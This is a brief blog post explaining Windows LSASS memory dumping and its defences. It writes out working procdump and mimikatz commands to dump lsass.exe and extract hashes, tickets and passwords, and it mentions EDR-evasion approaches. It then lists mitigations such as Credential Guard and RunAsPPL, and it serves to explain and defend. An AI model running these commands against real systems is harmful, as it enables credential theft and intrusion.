hackweb
notes on hacking and technology
IT EN
main menu
user menu
you are not logged in

LSASS dumping: credentials in memory

May 2, 2025 · 1 min read · #windows #credential-theft #lsass

LSASS handles Windows authentication and keeps session secrets in memory: NT hashes, Kerberos tickets, sometimes cleartext passwords (legacy WDigest).

The dump

With admin privileges you read LSASS memory and extract credentials offline:

procdump -ma lsass.exe lsass.dmp   # Microsoft-signed tool
mimikatz sekurlsa::minidump lsass.dmp + sekurlsa::logonpasswords

EDRs watch LSASS access, so attackers use stealthy techniques (duplicated handles, drivers, dumps via lesser-known APIs).

Defence

Credential Guard isolates secrets in a virtualized environment. LSASS as PPL (RunAsPPL) blocks access from unprotected processes. Disable WDigest. EDR with LSASS protection. Tiering to limit where privileged credentials run.


« back to home

latest posts
 
your IP address:
216.73.216.108
visitor #0
MOTD:
Every abstraction leaks somewhere.
Here we look at where.
topics